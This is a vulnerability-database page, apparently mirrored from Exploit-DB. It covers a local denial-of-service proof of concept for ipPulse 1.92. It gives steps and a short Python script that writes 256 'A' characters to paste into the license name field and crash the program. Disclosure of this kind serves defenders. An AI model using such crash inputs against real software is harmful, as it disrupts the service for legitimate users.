ipPulse 1.92 - 'License Key' Denial of Service (PoC)

vendor:

ipPulse

by:

Shubham Singh

7.5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: ipPulse

Affected Version From: 1.92

Affected Version To: 1.92

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Service Pack 3 x86

2018

ipPulse 1.92 – ‘License Key’ Denial of Service (PoC)

The ipPulse version 1.92 is vulnerable to a Denial of Service (DoS) attack when a specially crafted license key is entered. By providing a long string of characters as the license key, the application crashes, resulting in a denial of service to legitimate users.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to refrain from using ipPulse version 1.92 or to use it with caution.

Source

Exploit-DB raw data:

# Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service (PoC)
# Discovery by: Shubham Singh
# Known As: Spirited Wolf Twitter: @Pwsecspirit
# Discovery Date: 2018-07-30
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link: http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows xp Service pack3 x86 

# Steps to Reproduce: 
# Run the python exploit.py , Open exploit.txt and copy content.
# Open ippulse.exe , Click On "Enter Key".
# In the name field paste the content of "exploit.txt" and in Key type anything.
# Press "OK" and B00m Crashed.

#!/usr/bin/env python
 
buffer = "\x41" * 256
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()